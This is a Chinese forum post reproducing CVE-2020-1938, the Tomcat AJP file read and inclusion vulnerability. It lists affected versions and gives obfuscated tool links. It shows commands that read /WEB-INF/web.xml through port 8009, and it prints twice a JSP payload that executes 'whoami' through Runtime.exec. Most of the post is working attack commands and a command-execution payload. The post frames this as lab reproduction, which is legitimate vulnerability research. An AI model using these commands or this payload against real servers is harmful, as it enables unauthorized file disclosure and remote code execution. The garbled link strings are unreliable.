-
-
[分享]CVE-2020-1938_Tomcat_文件读取&包含漏洞复现
-
发表于: 2020-3-1 02:35
-
漏洞影响范围包括
Apache Tomcat 6
Apache Tomcat 7 < 7.0.100
Apache Tomcat 8 < 8.5.51
Apache Tomcat 9 < 9.0.31
一、利用工具:
460K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6K6N6U0y4F1j5X3g2S2M7%4c8Q4x3V1k6o6g2V1g2Q4x3X3b7J5x3o6t1H3i4K6u0V1x3e0V1K6z5q4)9J5k6q4c8G2L8h3q4U0N6q4)9J5k6r3k6A6L8r3g2Q4y4h3k6A6L8X3y4D9N6h3c8W2i4K6u0V1k6X3W2D9k6g2)9#2k6Y4u0W2j5h3c8Q4c8f1k6Q4b7V1y4Q4z5o6S2Q4c8e0g2Q4z5o6m8Q4z5f1k6Q4c8e0N6Q4z5e0c8Q4b7e0S2Q4c8e0S2Q4b7V1k6Q4z5e0W2Q4c8e0c8Q4b7V1c8Q4z5p5c8Q4c8e0g2Q4b7e0c8Q4b7e0N6Q4c8e0c8Q4b7V1c8Q4b7f1y4Q4c8e0N6Q4z5f1q4Q4z5o6c8Q4c8e0g2Q4b7U0N6Q4b7e0g2Q4c8e0g2Q4z5o6g2Q4b7U0N6c8b7g2q4Q4c8f1k6Q4b7V1y4Q4z5o6V1`.
使用方法:
(文件读取)
python2 "Tomcat-ROOT路径下文件读取(CVE-2020-1938).py" -p 8009 -f /test.txt 127.0.0.1
(文件包含)
python2 "Tomcat-ROOT路径下文件包含(CVE-2020-1938).py" -p 8009 -f /test.txt 127.0.0.1
二、环境搭建
270K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3q4J5j5$3S2A6N6X3g2Q4x3X3g2S2M7r3q4U0K9r3g2Q4x3X3g2G2M7X3N6Q4x3V1k6V1K9i4y4@1i4K6u0r3N6r3!0E0j5$3q4@1i4K6u0r3i4K6t1$3L8X3u0K6M7q4)9K6b7R3`.`. 直接下载官方环境包
三、复现
1、使用文件读取,查看web源代码:
python2 "Tomcat-ROOT路径下文件读取(CVE-2020-1938).py" -p 8009 -f /WEB-INF/web.xml 127.0.0.1
注意,此时的目录为web根目录
2、如果存在上传功能,上传txt进行包含攻击;(这里由于是测试环境,就复制一个txt文件到根目录假装上传;实际情况的话需要知道上传文件的路径)
这里上传的txt文件为”test.txt“
内容如下:
<%
java.io.InputStream in = Runtime.getRuntime().exec("whoami").getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
%><%
java.io.InputStream in = Runtime.getRuntime().exec("whoami").getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
%>[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
